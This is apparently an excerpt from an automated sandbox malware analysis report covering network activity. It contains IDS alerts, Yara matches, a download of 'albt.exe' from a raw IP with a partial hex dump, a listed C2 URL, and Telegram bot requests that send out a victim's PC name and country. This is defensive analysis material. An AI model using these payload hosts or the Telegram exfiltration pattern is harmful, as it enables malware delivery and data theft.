          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49778 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49805 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49818 -> 149.154.167.220:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: https://amazonenviro.com/245_Nsltarpncon
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Yara detected Generic Downloader
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291E72C InternetCheckConnectionA,4_2_0291E72C
          Source: global trafficTCP traffic: 192.168.2.4:49796 -> 46.151.208.21:587
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 05 Jan 2025 23:00:50 GMTAccept-Ranges: bytesETag: "ef51f5a9c55fdb1:0"Server: Microsoft-IIS/8.5Date: Mon, 06 Jan 2025 06:53:13 GMTContent-Length: 1161216Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d0 06 00 00 e4 0a 00 00 00 00 00 0c e8 06 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 12 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 07 00 6e 26 00 00 00 20 08 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 e8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 57 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 c4 06 00 00 10 00 00 00 c6 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 48 08 00 00 00 e0 06 00 00 0a 00 00 00 ca 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 1f 00 00 00 f0 06 00 00 20 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 ec 36 00 00 00 10 07 00 00 00 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 6e 26 00 00 00 50 07 00 00 28 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 80 07 00 00 00 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 90 07 00 00 02 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 7c 00 00 00 a0 07 00 00 7e 00 00 00 1e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 1c 0a 00 00 20 08 00 00 1c 0a 00 00 9c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 12 00 00 00 00 00 00 b8 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:16:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:55:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2018:43:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 166.62.27.188:443
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49756 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49753 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49779 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49767 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49794 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49786 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49776 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49798 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49802 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49806 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49768 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49795 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49780 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49796 -> 46.151.208.21:587
          Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
          Source: global trafficHTTP traffic detected: GET /albt.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
